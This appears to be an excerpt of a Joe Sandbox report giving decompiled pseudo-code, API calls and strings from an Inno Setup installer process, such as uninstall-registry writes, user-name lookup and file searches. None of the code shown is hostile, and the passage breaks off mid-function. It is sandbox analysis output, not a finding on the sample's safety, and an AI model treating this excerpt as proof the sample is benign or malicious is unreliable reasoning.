				E0042C614( *((intOrPtr*)(_a4 - 4)),  &_v332);
				E004036C4( &_v332, "unins???.*");
				_t42 = FindFirstFileA(E00403880(_v332),  &_v328); // executed
				_t79 = _t42;
				if(_t79 == 0xffffffff) {
					L10:
					_pop(_t88);
					 *[fs:eax] = _t88;
					_push(0x46c8c9);
					E00403548( &_v332);
					return E00403548( &_v8);
				} else {
					goto L1;
				}
				do {
					L1:
					E004036A4( &_v8, 0x104,  &(_v328.cFileName));
					if(E004036BC(_v8) >= 9) {
						E004038C0(_v8, 5, 1,  &_v332);
						if(E00406B28(_v332, 0x46c8ec) == 0 &&  *((intOrPtr*)(_v8 + 5)) + 0xd0 - 0xa < 0 &&  *((intOrPtr*)(_v8 + 6)) + 0xd0 - 0xa < 0 &&  *((intOrPtr*)(_v8 + 7)) + 0xd0 - 0xa < 0 &&  *((char*)(_v8 + 8)) == 0x2e) {
							E004038C0(_v8, 3, 6,  &_v332);
							 *((char*)(_a4 + E00406E34(_v332, 3) - 0x3ec)) = 1;
						}
					}
				} while (FindNextFileA(_t79,  &_v328) != 0);
				FindClose(_t79);
				goto L10;
			}

0x0046c77e
0x0046c784
0x0046c789
0x0046c78a
0x0046c78f
0x0046c792
0x0046c7a8
0x0046c7b8
0x0046c7c9
0x0046c7ce
0x0046c7d3
0x0046c8a1
0x0046c8a3
0x0046c8a6
0x0046c8a9
0x0046c8b4
0x0046c8c1
0x00000000
0x00000000
0x00000000
0x0046c7d9
0x0046c7d9
0x0046c7e7
0x0046c7f7
0x0046c811
0x0046c828
0x0046c86b
0x0046c87e
0x0046c87e
0x0046c828
0x0046c893
0x0046c89c
0x00000000

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,0046C8C2,?,?,00000001,004AE064), ref: 0046C7C9
FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,0046C8C2,?,?,00000001,004AE064), ref: 0046C88E
FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,0046C8C2,?,?,00000001,004AE064), ref: 0046C89C

Strings

unins???.*, xrefs: 0046C7B3
unins, xrefs: 0046C81C

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID: unins$unins???.*
API String ID: 3541575487-1009660736
Opcode ID: 79edc6893eee0575b0a6f18449132bbac53749cdf91c4cbabb36c5648d7f0dcf
Instruction ID: 33ad49aaf491854cb3993a248a4693ece76fee689ffe693aa0abc2175ea97b83
Opcode Fuzzy Hash: 79edc6893eee0575b0a6f18449132bbac53749cdf91c4cbabb36c5648d7f0dcf
Instruction Fuzzy Hash: 2E3160719001089FDB20EB65CD85AEEB7B8EB04355F1044F6E448E76A2EA38AF458F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1E0 Relevance: 3.1, APIs: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040B1E0(void* __eax, intOrPtr* __edx, void* __edi) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				signed int _t10;
				signed int _t11;
				intOrPtr _t17;
				intOrPtr* _t22;
				struct HINSTANCE__* _t26;
				void* _t30;
				intOrPtr _t33;
				void* _t36;
				intOrPtr _t39;
				intOrPtr _t41;

				_t39 = _t41;
				_t22 = __edx;
				_t36 = __eax;
				_t8 = E00403880(__eax);
				_t9 =  *0x48d014; // 0x400000
				_t10 = FindResourceA(_t9, _t8, 0xa);
				_t30 = _t10;
				_t11 = _t10 & 0xffffff00 | _t30 != 0x00000000;
				_t43 = _t11;
				if(_t11 == 0) {
					return _t11;
				} else {
					FreeResource(_t30);
					_t26 =  *0x48d014; // 0x400000
					_v8 = E0040D354(_t26, 1, 0xa, _t36);
					_push(_t39);
					_push(0x40b258);
					_push( *[fs:eax]);
					 *[fs:eax] = _t41;
					_t17 = E0040CFAC(_v8, _t22,  *_t22, __edi, _t36, _t43); // executed
					 *_t22 = _t17;
					_pop(_t33);
					 *[fs:eax] = _t33;
					_push(E0040B25F);
					return E00402CA0(_v8);
				}
			}

0x0040b1e1
0x0040b1e6
0x0040b1e8
0x0040b1ee
0x0040b1f4
0x0040b1fa
0x0040b1ff
0x0040b203
0x0040b206
0x0040b208
0x0040b265
0x0040b20a
0x0040b20b
0x0040b213
0x0040b225
0x0040b22a
0x0040b22b
0x0040b230
0x0040b233
0x0040b23b
0x0040b240
0x0040b244
0x0040b247
0x0040b24a
0x0040b257
0x0040b257

APIs

FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040B1FA
FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B357,00000000,0040B36F,?,?,?,?), ref: 0040B20B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Resource$FindFree
String ID:
API String ID: 4097029671-0
Opcode ID: 8179243415f7173b25aa8f89b34ff10cf1b51fc602e78da2815b8442b2925082
Instruction ID: 5c7760e24935e35d9f6d48fd206d415cb2757f1fb177ca889cb32efdc27a87a7
Opcode Fuzzy Hash: 8179243415f7173b25aa8f89b34ff10cf1b51fc602e78da2815b8442b2925082
Instruction Fuzzy Hash: 4101F2B1704300AFDB00EF659C92A1E77AEDB89718B1080BAF504BB2D1DA79AC01966D

Uniqueness

Uniqueness Score: -1.00%

Function 00451554 Relevance: 3.0, APIs: 2, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00451554(void* __eax, struct _WIN32_FIND_DATAA* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				char _v16;
				long _v20;
				void* _t13;
				intOrPtr _t27;
				void* _t35;
				void* _t37;
				intOrPtr _t38;

				_t35 = _t37;
				_t38 = _t37 + 0xfffffff0;
				if(E00451338(__eax,  &_v16) != 0) {
					_push(_t35);
					_push(0x4515b7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t38;
					_t13 = FindFirstFileA(E00403880(__edx), __ecx); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E004515BE);
					return E00451374( &_v16);
				} else {
					_v8 = 0xffffffff;
					return _v8;
				}
			}

0x00451555
0x00451557
0x0045156f
0x0045157c
0x0045157d
0x00451582
0x00451585
0x00451591
0x00451596
0x0045159e
0x004515a3
0x004515a6
0x004515a9
0x004515b6
0x00451571
0x00451571
0x004515d0
0x004515d0

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,004515B7,?,?,-00000001,00000000), ref: 00451591
GetLastError.KERNEL32(00000000,?,00000000,004515B7,?,?,-00000001,00000000), ref: 00451599

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: 8b9fc72d6d0f812d1e8995e0c2e840b37626c4d2c458be265b20e4f57e4d6ec2
Instruction ID: bfb7ad4e292cc9a7f3bdb0efd1cb8dc2f20019426523d9053300f439ebd10ee4
Opcode Fuzzy Hash: 8b9fc72d6d0f812d1e8995e0c2e840b37626c4d2c458be265b20e4f57e4d6ec2
Instruction Fuzzy Hash: E5F04931A00208BBDB00EFB69C0199EB7ECDB8533571043BBFC14D36A2EA384E04859C

Uniqueness

Uniqueness Score: -1.00%

Function 0040874C Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040874C(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100); // executed
				_t19 = _t5;
				if(_t5 <= 0) {
					return E004035DC(_t10, _t18);
				}
				return E00403628(_t10, _t5 - 1,  &_v260, _t19);
			}

0x00408757
0x00408759
0x0040876a
0x0040876f
0x00408771
0x00000000
0x00408789
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0048D4C0,00000001,?,00408817,?,00000000,004088F6), ref: 0040876A

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b5e59121c0485216f736cf60e29a225d100e5c625b41710ba3703d3c89c57ccb
Instruction ID: 67c1a259903e60f1a260a86ecadb6f1e1c5df7e084d28e6d0527f7601475ed28
Opcode Fuzzy Hash: b5e59121c0485216f736cf60e29a225d100e5c625b41710ba3703d3c89c57ccb
Instruction Fuzzy Hash: 46E0D83270021867D320A9594C82EFB725C975C310F10027FBD48E73C6EDB49E808AED

Uniqueness

Uniqueness Score: -1.00%

Function 00423D9C Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00423D9C(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x20));
				_push(_t26); // executed
				L00405F44(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}

0x00423da8
0x00423db2
0x00423dbb
0x00423dc2
0x00423dc5
0x00423dc6
0x00423dd1
0x00423dd5

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424369,?,00000000,00424374), ref: 00423DC6

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: dee3debf3bf867fbe166f0ae90dcda9a76317741a1cabe1ccca9685fe658f725
Instruction ID: c0bff1834ed63ee25d2c66c9b674342af83fa90cb7b26d3003ccd909ce326bfe
Opcode Fuzzy Hash: dee3debf3bf867fbe166f0ae90dcda9a76317741a1cabe1ccca9685fe658f725
Instruction Fuzzy Hash: 40F0B379205609AF8B40DF99C588D4ABBE8AB4C260B058295B988CB321C234ED808F94

Uniqueness

Uniqueness Score: -1.00%

Function 00453A24 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00453A24(void* __eax) {
				char _v260;
				int _t5;
				void* _t10;
				DWORD* _t13;

				_t13 =  &_v260;
				_t10 = __eax;
				 *_t13 = 0x100;
				_t5 = GetUserNameA( &_v260, _t13); // executed
				if(_t5 == 0) {
					return E00403548(_t10);
				}
				return E004036A4(_t10, 0x100,  &_v260);
			}

0x00453a25
0x00453a2b
0x00453a2d
0x00453a3a
0x00453a41
0x00000000
0x00453a57
0x00000000

APIs

GetUserNameA.ADVAPI32(?), ref: 00453A3A

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 06b2738348cd7699efc0d38453dbec6632bc5569034c2eb818a064540a6037f0
Instruction ID: b8f40a0a2693ba387f788c1d2cc48988c4bac9fcf4bc1c4faf8bed26d9b1d0e8
Opcode Fuzzy Hash: 06b2738348cd7699efc0d38453dbec6632bc5569034c2eb818a064540a6037f0
Instruction Fuzzy Hash: E0D0C2B120420063DB00AE698C816D6768C8B84312F10483E7CCAC63D3EABDCF98465B

Uniqueness

Uniqueness Score: -1.00%

Function 0046771C Relevance: 61.6, APIs: 1, Strings: 34, Instructions: 370
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E0046771C(void* __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _t120;
				intOrPtr _t121;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				intOrPtr _t215;
				intOrPtr* _t236;
				void* _t254;
				intOrPtr _t255;
				intOrPtr _t267;
				void* _t270;
				void* _t273;
				void* _t279;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				intOrPtr _t307;
				intOrPtr _t309;
				intOrPtr _t311;
				void* _t318;
				intOrPtr _t334;
				intOrPtr _t340;
				intOrPtr _t344;
				intOrPtr _t366;
				intOrPtr _t368;
				intOrPtr _t380;
				void* _t385;
				void* _t387;
				void* _t388;
				intOrPtr _t389;
				void* _t402;

				_t402 = __fp0;
				_t383 = __edi;
				_t387 = _t388;
				_t389 = _t388 + 0xffffffe0;
				_push(__edi);
				_v24 = 0;
				_v12 = 0;
				_v20 = 0;
				_t385 = __eax;
				_push(_t387);
				_push(0x467c56);
				_push( *[fs:eax]);
				 *[fs:eax] = _t389;
				if( *0x4ae252 == 0) {
					_v8 = 0x80000001;
				} else {
					_v8 = 0x80000002;
				}
				_push("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\");
				_push(_t385);
				_push("_is1");
				E0040377C();
				_t120 = E00403880(_v12);
				_t121 =  *0x48cb0c; // 0x1, executed
				E0042DE2C(_t121, 0x4ae064, _t120, 0x80000001, _t383, _t385); // executed
				if( *0x4ae252 != 0) {
					_t254 = E00403880(_v12);
					_t255 =  *0x48cb0c; // 0x1, executed
					E0042DE2C(_t255, 0x4ae064, _t254, 0x80000002, _t383, _t385); // executed
				}
				_t125 = E00403880(_v12);
				_t126 =  *0x48cb0c; // 0x1, executed
				_t127 = E0042DD50(_t126, _t125, _v8, 0,  &_v16, 0, 2, 0, 0, 0); // executed
				_t392 = _t127;
				if(_t127 != 0) {
					E0046755C(1, 0x4ae064, _v12, _v8, _t383, _t385, _t392, _t127);
				}
				_push(_t387);
				_push(0x467c07);
				_push( *[fs:eax]);
				 *[fs:eax] = _t389;
				E00467678(_v16, "5.1.2-beta", "Inno Setup: Setup Version", _t387); // executed
				if(( *0x004AE17C & 0x00000004) == 0) {
					E00403548( &_v20);
				} else {
					_t380 =  *0x4ae22c; // 0x221f670
					E004035DC( &_v20, _t380);
				}
				E00467678(_v16, _v20, "Inno Setup: App Path", _t387); // executed
				E0042C614(_v20,  &_v24);
				E004676C0(_v16, _v24, "InstallLocation", _t387); // executed
				_t267 =  *0x4ae230; // 0x222f970
				E00467678(_v16, _t267, "Inno Setup: Icon Group", _t387); // executed
				if( *0x4ae234 != 0) {
					E004676E8(_v16, "Inno Setup: No Icons", _t387);
				}
				E00453A24( &_v24);
				E00467678(_v16, _v24, "Inno Setup: User", _t387); // executed
				_pop(_t270);
				if( *0x4ae238 != 0) {
					_t236 =  *0x4ae238; // 0x0
					E00467678(_v16,  *_t236, "Inno Setup: Setup Type", _t387);
					E00467168( &_v24);
					E00467678(_v16, _v24, "Inno Setup: Selected Components", _t387);
					_pop(_t318);
					E0046717C( &_v24, 0x4ae064, _t318, _t383, _t385);
					E00467678(_v16, _v24, "Inno Setup: Deselected Components", _t387);
					_pop(_t270);
				}
				if( *0x4ae25c != 0) {
					E00467230( &_v24);
					E00467678(_v16, _v24, "Inno Setup: Selected Tasks", _t387);
					E00467244( &_v24, 0x4ae064, _t383, _t385);
					E00467678(_v16, _v24, "Inno Setup: Deselected Tasks", _t387);
					_pop(_t270);
				}
				if(( *0x004AE180 & 0x00000001) != 0) {
					_t307 =  *0x4ae220; // 0x0
					E00467678(_v16, _t307, "Inno Setup: User Info: Name", _t387);
					_t309 =  *0x4ae224; // 0x0
					E00467678(_v16, _t309, "Inno Setup: User Info: Organization", _t387);
					_t311 =  *0x4ae228; // 0x0
					E00467678(_v16, _t311, "Inno Setup: User Info: Serial", _t387);
					_pop(_t270);
				}
				if( *0x004AE0A4 == 0) {
					_t334 =  *0x4ae27c; // 0x21e49f8
					E004035DC( &_v20, _t334);
				} else {
					E004717F8( *((intOrPtr*)(0x4ae0a4)), _t270,  &_v20);
				}
				E004038C0(_v20, 0x3f, 1,  &_v24);
				E00467678(_v16, _v24, "DisplayName", _t387); // executed
				_pop(_t273);
				E004717F8( *0x004AE0A8, _t273,  &_v24);
				E004676C0(_v16, _v24, "DisplayIcon", _t387); // executed
				E004035DC( &_v24, 0x467e68);
				_t340 =  *0x4ae048; // 0x22307f0
				E004036C4( &_v24, _t340);
				E004036C4( &_v24, 0x467e68);
				E00467678(_v16, _v24, "UninstallString", _t387); // executed
				E004035DC( &_v24, 0x467e68);
				_t344 =  *0x4ae048; // 0x22307f0
				E004036C4( &_v24, _t344);
				E004036C4( &_v24, "\" /SILENT");
				E00467678(_v16, _v24, "QuietUninstallString", _t387); // executed
				_pop(_t279);
				E004717F8( *0x004AE084, _t279,  &_v24);
				E004676C0(_v16, _v24, "DisplayVersion", _t387); // executed
				_pop(_t281);
				E004717F8( *0x004AE074, _t281,  &_v24);
				E004676C0(_v16, _v24, "Publisher", _t387); // executed
				_pop(_t283);
				E004717F8( *0x004AE078, _t283,  &_v24);
				E004676C0(_v16, _v24, "URLInfoAbout", _t387); // executed
				_pop(_t285);
				E004717F8( *0x004AE07C, _t285,  &_v24);
				E004676C0(_v16, _v24, "HelpLink", _t387); // executed
				_pop(_t287);
				E004717F8( *0x004AE080, _t287,  &_v24);
				E004676C0(_v16, _v24, "URLUpdateInfo", _t387); // executed
				_pop(_t289);
				E004717F8( *0x004AE0C0, _t289,  &_v24);
				E004676C0(_v16, _v24, "Readme", _t387);
				_pop(_t291);
				E004717F8( *0x004AE0C4, _t291,  &_v24);
				E004676C0(_v16, _v24, "Contact", _t387);
				_pop(_t293);
				E004717F8( *0x004AE0C8, _t293,  &_v24);
				E004676C0(_v16, _v24, "Comments", _t387);
				_pop(_t295);
				E004717F8( *0x004AE0CC, _t295,  &_v20);
				if(_v20 == 0) {
					E004676E8(_v16, "NoModify", _t387); // executed
				} else {
					E00467678(_v16, _v20, "ModifyPath", _t387);
				}
				E004676E8(_v16, "NoRepair", _t387); // executed
				_t400 =  *0x4ae298;
				if( *0x4ae298 != 0) {
					_push(_t387);
					_push(0x467bd0);
					_push( *[fs:eax]);
					 *[fs:eax] = _t389;
					_v32 = _v16;
					_v28 = 0;
					_t215 =  *0x4ae298; // 0x21fdcf0
					E00487508(_t215,  &_v32, "RegisterPreviousData", _t400, _t402, 0, 0);
					_pop(_t368);
					 *[fs:eax] = _t368;
				}
				_pop(_t366);
				 *[fs:eax] = _t366;
				_push(0x467c0e);
				return RegCloseKey(_v16);
			}

0x0046771c
0x0046771c
0x0046771d
0x0046771f
0x00467724
0x00467727
0x0046772a
0x0046772d
0x00467730
0x00467739
0x0046773a
0x0046773f
0x00467742
0x0046774c
0x00467757
0x0046774e
0x0046774e
0x0046774e
0x0046775e
0x00467763
0x00467764
0x00467771
0x00467779
0x00467785
0x0046778a
0x00467796
0x0046779b
0x004677a7
0x004677ac
0x004677ac
0x004677c4
0x004677ce
0x004677d3
0x004677d8
0x004677da
0x004677e5
0x004677e5
0x004677ec
0x004677ed
0x004677f2
0x004677f5
0x00467806
0x00467813
0x00467828
0x00467815
0x00467818
0x0046781e
0x0046781e
0x00467839
0x00467846
0x00467856
0x00467862
0x0046786b
0x00467878
0x00467888
0x0046788d
0x00467892
0x004678a2
0x004678a7
0x004678af
0x004678b2
0x004678c1
0x004678cb
0x004678db
0x004678e0
0x004678e5
0x004678f5
0x004678fa
0x004678fa
0x00467902
0x00467908
0x00467918
0x00467922
0x00467932
0x00467937
0x00467937
0x0046793f
0x00467947
0x00467950
0x0046795c
0x00467965
0x00467971
0x0046797a
0x0046797f
0x0046797f
0x00467984
0x00467996
0x0046799c
0x00467986
0x0046798c
0x0046798c
0x004679b3
0x004679c3
0x004679c8
0x004679d0
0x004679e0
0x004679ef
0x004679f7
0x004679fd
0x00467a0a
0x00467a1a
0x00467a29
0x00467a31
0x00467a37
0x00467a44
0x00467a54
0x00467a59
0x00467a61
0x00467a71
0x00467a76
0x00467a7e
0x00467a8e
0x00467a93
0x00467a9b
0x00467aab
0x00467ab0
0x00467ab8
0x00467ac8
0x00467acd
0x00467ad5
0x00467ae5
0x00467aea
0x00467af2
0x00467b02
0x00467b07
0x00467b0f
0x00467b1f
0x00467b24
0x00467b2c
0x00467b3c
0x00467b41
0x00467b48
0x00467b51
0x00467b75
0x00467b53
0x00467b5f
0x00467b64
0x00467b89
0x00467b8f
0x00467b96
0x00467b9a
0x00467b9b
0x00467ba0
0x00467ba3
0x00467bad
0x00467bb0
0x00467bbc
0x00467bc1
0x00467bc8
0x00467bcb
0x00467bcb
0x00467bf2
0x00467bf5
0x00467bf8
0x00467c06

APIs

Part of subcall function 00467678: 6D2B68C0.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00000001,004AE064,?,0046780B,?,00000000,00467C07,?,_is1), ref: 0046769B

RegCloseKey.ADVAPI32(?,00467C0E,?,_is1,00000001,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,00467C56,?,?,00000001,004AE064), ref: 00467C01

Strings

Publisher, xrefs: 00467A86
NoRepair, xrefs: 00467B7C
Inno Setup: Setup Version, xrefs: 004677F9
Inno Setup: User Info: Serial, xrefs: 0046796C
Comments, xrefs: 00467B34
QuietUninstallString, xrefs: 00467A4C
URLInfoAbout, xrefs: 00467AA3
DisplayName, xrefs: 004679BB
Inno Setup: Selected Components, xrefs: 004678D3
HelpLink, xrefs: 00467AC0
Inno Setup: User Info: Name, xrefs: 00467942
Readme, xrefs: 00467AFA
Inno Setup: User, xrefs: 0046789A
Inno Setup: App Path, xrefs: 0046782E
URLUpdateInfo, xrefs: 00467ADD
UninstallString, xrefs: 00467A12
DisplayVersion, xrefs: 00467A69
5.1.2-beta, xrefs: 004677FE
InstallLocation, xrefs: 0046784E
NoModify, xrefs: 00467B68
Inno Setup: Deselected Components, xrefs: 004678ED
Contact, xrefs: 00467B17
ModifyPath, xrefs: 00467B54
Software\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 0046775E
Inno Setup: Selected Tasks, xrefs: 00467910
DisplayIcon, xrefs: 004679D8
Inno Setup: No Icons, xrefs: 0046787B
Inno Setup: User Info: Organization, xrefs: 00467957
Inno Setup: Deselected Tasks, xrefs: 0046792A
_is1, xrefs: 00467764
Inno Setup: Setup Type, xrefs: 004678B9
RegisterPreviousData, xrefs: 00467BB7
Inno Setup: Icon Group, xrefs: 0046785D
" /SILENT, xrefs: 00467A3F

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Close
String ID: " /SILENT$5.1.2-beta$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$HelpLink$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallLocation$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
API String ID: 3535843008-3420366150
Opcode ID: 760a431ebea9d8018caf2cce00bf7943a13a864b76c061a8f1aae54a1c95ccd4
Instruction ID: bcf45d01afdc882ad5ccafe89175aa7c7628ae35465c9aa604cb69e7ccd6ea96
Opcode Fuzzy Hash: 760a431ebea9d8018caf2cce00bf7943a13a864b76c061a8f1aae54a1c95ccd4
Instruction Fuzzy Hash: 83E19A71A041099BD704EF59D881AAF77B9EF45318F60846BE410773A1EB38BD01CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 004851C4 Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E004851C4(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				char _v5;
				char _v12;
				char _v16;
				long _t81;
				long _t90;
				signed int _t103;
				intOrPtr* _t111;
				long _t127;
				long _t135;
				int _t137;
				signed int _t140;
				long _t144;
				int _t146;
				signed int _t149;
				long _t153;
				int _t155;
				long _t169;
				int _t171;
				int _t173;
				signed int _t176;
				long _t180;
				int _t182;
				int _t184;
				signed int _t187;
				long _t191;
				int _t193;
				int _t195;
				struct HWND__* _t212;
				void* _t219;
				intOrPtr _t275;
				intOrPtr* _t367;
				intOrPtr* _t368;
				void* _t371;
				intOrPtr _t374;

				_t377 = __fp0;
				_t219 = __ecx;
				_t373 = _t374;
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_t218 = _a4;
				_push(_t374);
				_push(0x4856b9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				_t371 =  *((intOrPtr*)(_a4 + 0xc)) - 1;
				_v5 = 1;
				E004037CC( *((intOrPtr*)(__edx + 0x10)), 0x4856d4);
				if(_t371 != 0) {
					E004037CC( *((intOrPtr*)(__edx + 0x10)), "FINDWINDOWBYCLASSNAME");
					if(__eflags != 0) {
						E004037CC( *((intOrPtr*)(__edx + 0x10)), "FINDWINDOWBYWINDOWNAME");
						if(__eflags != 0) {
							E004037CC( *((intOrPtr*)(__edx + 0x10)), "SENDMESSAGE");
							if(__eflags != 0) {
								E004037CC( *((intOrPtr*)(__edx + 0x10)), "POSTMESSAGE");
								if(__eflags != 0) {
									E004037CC( *((intOrPtr*)(__edx + 0x10)), "SENDNOTIFYMESSAGE");
									if(__eflags != 0) {
										E004037CC( *((intOrPtr*)(__edx + 0x10)), "REGISTERWINDOWMESSAGE");
										if(__eflags != 0) {
											E004037CC( *((intOrPtr*)(__edx + 0x10)), "SENDBROADCASTMESSAGE");
											if(__eflags != 0) {
